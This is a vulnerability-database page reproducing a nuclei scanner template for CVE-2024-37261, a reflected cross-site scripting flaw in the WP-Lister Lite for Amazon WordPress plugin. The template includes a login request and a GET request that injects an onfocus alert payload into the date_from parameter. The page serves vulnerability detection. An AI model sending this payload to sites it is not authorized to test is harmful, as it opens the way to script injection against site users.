Lucene search
K

WP-Lister Lite for Amazon <= 2.6.16 - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

Reflected XSS in WP-Lister Lite for Amazon up to 2.6.16 enables unauthenticated script injection.

Related
Refs
Code
id: CVE-2024-37261

info:
  name: WP-Lister Lite for Amazon <= 2.6.16 - Cross-Site Scripting
  author: Kazgangap
  severity: medium
  description: |
    The WP-Lister Lite for Amazon plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.6.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  reference:
    - https://patchstack.com/database/vulnerability/wp-lister-for-amazon/wordpress-wp-lister-lite-for-amazon-plugin-2-6-16-reflected-cross-site-scripting-xss-vulnerability
    - https://wordpress.org/plugins/wp-lister-for-amazon/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-37261
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-37261
    epss-score: 0.0063
    epss-percentile: 0.45749
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: wplab
    product: wp-lister-lite-for-amazon
  tags: cve,cve2024,wordpress,wp,wp-plugin,wp-lister-for-amazon,xss,vkev,authenticated

variables:
  rand: '{{to_lower(rand_text_alpha(12))}}'

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=wpla-tools&tab=stock_log&date_from={{rand}}%22+autofocus+onfocus%3D%22alert%28document.domain%29%22+x%3D%22 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="{{rand}}\" autofocus onfocus=\"alert(document.domain)\"'
          - 'name="date_from"'
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d0e9f408b6f7f91287bee67461f9455dffdcf6ac79f07147489a5017e8853d80022100f0bf2814975bffec8cf8f7ce33b14d97edd41f5b4c26693af30586ebde2c1e92:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 17:52Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.16.1 - 7.1
EPSS0.0063
SSVC
11